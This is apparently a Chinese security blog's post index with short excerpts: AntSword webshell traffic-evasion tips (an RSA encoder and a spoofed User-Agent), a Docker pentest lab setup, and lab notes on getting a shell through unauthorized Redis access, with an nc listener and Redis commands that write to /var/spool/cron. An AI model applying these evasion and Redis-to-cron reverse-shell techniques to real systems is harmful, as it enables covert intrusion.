limb0的博客

学蚁致用（二）——RSA流量免杀这里仅演示蚁剑自带RSA编码器功能的使用方法，不做原理探讨。AntSword——编码设置——编码管理——RSA配置——生成，生成webshell：将webshell复制到服务端，然后新建编码器——PHP RSA：配置连接，注意这里选择刚才新建的编码器，解码器选择base64：警告：返回数据为空！代理抓包看看：未开启open_ssl 扩展，这里我们以phpstudy为例（有些版本有坑，我用的PHP-5.6.27）演示如何开启：开启后再次尝试：查看流量

学蚁致用（一）——修改UA特征找到AntSword\antSword-2.1.9\modules\request.js修改一处：const USER_AGENT = 'antSword/v2.1';找到AntSword\antSword-2.1.9\modules\update.js修改两处：.set('User-Agent', "antSword/v2.0")这里修改为Baiduspider-image以上修改完以后，还有一点需要注意，使用GET请求，仍然带有antsword特征，容易暴

使用docker快速搭建渗透测试靶机环境安装dockerDocker 支持以下的 64 位 CentOS 版本：CentOS 7CentOS 8更高版本…这里我使用的是CentOS-7-x86_64-Everything-1804.iso的镜像。卸载旧版本较旧的Docker版本称为docker或docker-engine。如果已安装这些程序，请卸载它们以及相关的依赖项。$ su...

《Redis未授权访问getshell》复现笔记（二）复现完了写马getshell，我们再来复现一下利用crontab反弹shell：使用nc.exe在攻击机上监听9999端口：nc –lvvp 9999还是使用Redis Clinet写入如下命令config set dir /var/spool/cronconfig set dbfilename rootset xxx "\n...

《Redis未授权访问getshell》复现笔记（一）利用周末复现了一下Redis未授权访问getshell，期间遇到了一些坑，虽然结果没什么悬念，却花费了不少时间，故将过程详细记录，留给有需要的人。此贴仅供新手参考，大佬勿喷。一、 环境介绍靶机：CentOS 6.5 （点击下载） IP：192.168.17.140攻击机：Win10（本机） IP：192.168.8.195二、...